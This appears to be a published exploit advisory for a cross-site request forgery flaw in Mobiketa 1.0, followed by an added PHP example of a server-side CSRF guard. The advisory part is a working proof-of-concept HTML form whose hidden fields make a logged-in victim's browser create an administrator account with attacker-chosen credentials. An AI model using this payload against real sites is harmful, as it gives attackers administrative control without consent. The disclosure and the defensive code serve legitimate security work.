Mobiketa 1.0 Cross Site Request Forgery
Posted on 13 June 2016
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0
# Exploit:
< -- bug code started -- >
-->
<html>
<body>
<form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="is_admin" value="1" />
  <input type="hidden" name="name" value="murat y" />
  <input type="hidden" name="email" value="murrat@protonmail.com" />
  <input type="hidden" name="username" value="murrat" />
  <input type="hidden" name="password" value="123123123" />
  <input type="hidden" name="id" value="15" />
  <input type="hidden" name="update" value=" " />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
< -- end of the bug code -- >
#########################
[+] Contact: http://twitter.com/muratyilmazlarr
-->
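
A server-side guard against the cross-origin POST shown above, as an added example that is not part of the original advisory or of Mobiketa's code. It assumes a PHP session is in use and that the guard is included before `index.php` dispatches `url=user`; `csrf_token`, `csrf_field`, `same_origin`, `csrf_guard` and the host `admin.example.test` are hypothetical names.

```php
<?php
// Added example: hypothetical CSRF guard, not Mobiketa's own code.
declare(strict_types=1);

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // SameSite keeps the session cookie off cross-site form posts (PHP 7.3+).
        session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to emit inside every state-changing form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES) . '" />';
}

// True only when Origin (or, failing that, Referer) names the expected host.
function same_origin(array $server, string $allowedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = is_string($source) ? parse_url($source, PHP_URL_HOST) : null;
    return is_string($host) && strcasecmp($host, $allowedHost) === 0;
}

// Reject any POST that lacks same-origin provenance or a matching token.
function csrf_guard(array $server, array $post, string $allowedHost): void
{
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return; // only state-changing requests are checked here
    }
    $sent = $post['csrf_token'] ?? '';
    if (!same_origin($server, $allowedHost) || !is_string($sent)
        || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
}

// Assumption: 'admin.example.test' stands in for the site's real host name.
csrf_guard($_SERVER, $_POST, 'admin.example.test');
```

The user-edit form has to emit `csrf_field()` for legitimate submissions to pass; a form hosted on another origin cannot read the session token, so its POST is answered with 403.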